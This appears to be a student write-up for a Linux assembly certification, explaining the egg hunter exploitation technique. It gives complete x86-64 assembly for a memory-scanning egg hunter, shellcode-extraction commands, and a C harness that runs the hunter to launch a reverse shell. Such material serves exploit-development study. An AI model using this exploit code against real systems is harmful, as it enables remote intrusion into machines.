Notes, Code, and Others
The objective of this assignment is to create an Egg Hunter Shellcode. For that is required to:
A must read paper, that came during the research, is Safely Searching Process Virtual Address Space from skape. It describes what a Egg Hunter is, the requirements for it to safely do it’s job, and ways to search in memory for that Egg.
When we want to exploit a buffer overflow vulnerability injecting shellcode to it, we can find out, that the space remaining in the buffer is too small to place our entire shellcode.
Here is when the Egg Hunter Technique comes in place: An Egg is placed at the begining of the shellcode that we want to execute in the victim, and inject it along with a shellcode defining the instructions to find that Egg in memory. Once the Egg is found, execution is passed to the shellcode, placed just after the Egg.
The Egg Hunter Shellcode will have to search in the Virtual Address Space for the Egg. As searching in the VAS is a dangerous process, an Egg Hunter Shellcode must have the following requirements:
In the paper, the autor mentions diferent techniques to search in memory using sys_access
. This is the solution that is going to be implemented here.
Some considerations to have in mind:
, instead of using a pathname to the function parameter, a memory address can be used to check if that memory position has been allocated. If it’s not allocated, the syscall will return an EFAULT
error code. If this is the case, there is no need to search on this memory address, as is not allocated for the process. The call requires two parameters: (1) The pathname
, that’s the memory position to check, and (2) mode
, that will be F_OK
just to check if the position is there.
int access (const char * pathname, int mode);
Memory positions are agrupated into pages. This makes the search in memory with sys_access
shorter, as if the syscall tries to access a position of memory not allocated, the whole page where this memory position belongs to, won’t be accesible. Hence, only is needed to check one memory position for each memory page.
All this said, the Egg Hunter Shellcode has to do the following:
The summarized pseudocode will be:
while (remain memory pages to check){
if ( memory_page_is_accessible(first_memory_position_of_the_page) ) {
i = 0;
if (memory_position[i] == “EGG”) {
if (memory_position[i+1] == “EGG”) {
} else {
} else {
The memory page size is usually 4096 bytes (hex value of: 0x1000
). This value is required to know in the Egg Hunter how many memory positions to search for each page. To check this value, the following code in C will show the size of the pages:
#include <stdio.h>
#include <unistd.h>
void main(void)
int size = getpagesize();
printf("\nPage size on this system is %i bytes\n", size);
Following is taken into consideration during the implementation:
(page size). Result of the Or will always point to the first byte of the next page to check.
will place NULLs in the codee for the or
instruction, the trick is to first or rdx, 0x0FFF
(4095 in dec) and then inc rdx
. This gives same results but without NULLs.sys_access
requires two parameters:
(page size) until sys_access
finds that the page is accessible. From here, RDX is used to check each memory position in the page for the Egg.The following code implements the Egg Hunter Shellcode. The code does not remove NULLs at this time, it will be done later.
global _start
section .text
EGG equ 'kaki'
xor rdx, rdx
or dx, 0xfff ; 0xfff == 4095. To jump next page
inc rdx ; Two uses:
; 1) Next memory position when checking memory positions into a page
; 2) Place pointer at the first byte of a memory page
lea rdi, [rdx + 8] ; Stores memory position after the "eggs"
mov rax, 0x15 ; Syscall number for access()
xor rsi, rsi
syscall ; Test if mem position is accessible
; RDI -> Address to check
; RSI -> 0
cmp rax, 0xf2 ; EFAULT?
jz next_mem_page ; Yes, then check next page
mov rax, EGG ; Page accessible, let's check if we find the egg
mov rdi, rdx ; Put in RDI the memory position to check if has the egg
scasd ; We compare. scasd increments RDI
jnz next_mem_position ; Not found the egg, jump to next memory position in the page
scasd ; Found 4 bytes of the egg, let's check if next 4 byte also have the egg
jnz next_mem_position ; Not found second egg, jump again to check next memory position
jmp rdi ; EGG found. Jump to execute it's shellcode.
; The RDI already pointing to the start of the shellcode due scasd increments
For the ASM code, it’s time now to remove the NULLs and try to reduce it’s shellcode size as much as possible. The process will be the same one done in previous assignments:
objdump -M intel -d EggHunter.o
to review NULLs and opcodesThe code ends up like this. This time has not been reduced too much:
global _start
section .text
xor rdx, rdx ; Pointer to memory positions
or dx, 0xfff ; 0xfff == 4095. To jump next page
inc rdx ; Two uses:
; 1) Next memory position when checking memory positions into a page
; 2) Place pointer at the first byte of a memory page
lea rdi, [rdx + 8] ; Shellcode position
;mov rax, 0x15 ; Syscall number for access()
push 21
pop rax
xor rsi, rsi
syscall ; Test if memory position is accessible
; RDI -> Address to check
; RSI -> 0
cmp al, 0xf2 ; EFAULT?
jz next_mem_page ; Yes, then check next page
;mov rax, EGG ; Page accessible, let's check if we find the egg
push "kaki" ; This is the egg value. 4 bytes. Change here
pop rax
;mov rdi, rdx ; Put in RDI the memory position to check if has the egg
push rdx
pop rdi
scasd ; We compare. scasd increments RDI
jnz next_mem_position ; Not found the egg, jump to next memory position in the page
scasd ; Found 4 bytes of the egg, let's check if next 4 byte also have the egg
jnz next_mem_position ; Not found second egg, jump again to check next memory position
jmp rdi ; EGG found. Jump to execute it's shellcode.
; The RDI already pointing to the start of the shellcode due scasd increments
For the demo of the Egg Hunter Technique, the shellcode.c
template is used. Just some extra information is going to be printed this time:
Now, the shellcode for the Egg Hunter is generated with one liner objdump
SLAE64> echo “\"$(objdump -d EggHunterV2.o | grep '[0-9a-f]:' |
cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\"""
Also, the shellcode that is used is the one from the Assignment #2:
SLAE64> nasm -f elf64 ReverseShell-ExecveStack_V2.nasm -o ReverseShell-ExecveStack_V2.o
SLAE64> echo “\"$(objdump -d ReverseShell-ExecveStack_V2.o | grep '[0-9a-f]:' |
cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\"""
Both shellcodes are populated into the shellcode.c
#include <stdio.h>
#include <string.h>
//#define EGG "\x90\x50\x90\x50"
#define EGG "kaki"
unsigned char egg_hunter[] = \
unsigned char code[]= EGG EGG \
void main()
printf("ShellCode Lenght + Eggs: %d\n", strlen(code));
printf("Shellcode at position: %p\n", code);
printf("Egg Hunter ShellCode Size: %d\n", strlen(egg_hunter));
printf("Egg Hunter Shellcode at position: %p\n", egg_hunter);
int (*ret)() = (int(*)())egg_hunter;
When the program was compiled with the gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
command, and run, it will take too long to find the shellcode. This is because the Hunter code, will start from the 1st lower memory position, and the program will be far from there.
Just for the POC, we can compile with gcc forcing the .text sextion to be in low memory positions to make the find process easier. This is done with the following gcc options:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode -Wl,-Ttext-segment,0x20000000
Once compiled with this options, the “egg” is found quickly. To test it, a netcat
listener on port 4444 is needed on one terminal, and in the other terminal, ./shellcode
is executed. Everything works great, spawning a shell:
If another shellcode has to be tested, just need to replace the shellcode in code[]
string in the shellcode.c
and compile.
In case that another Egg value has to be used, also needs to be replaced in the EGG
defined in the shellcode.c
and also in the ASM code where it is hardcoded (it’s commented in the code).
The GitHub Repo for this assignment contains the following files:
This pages have been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: PA-14628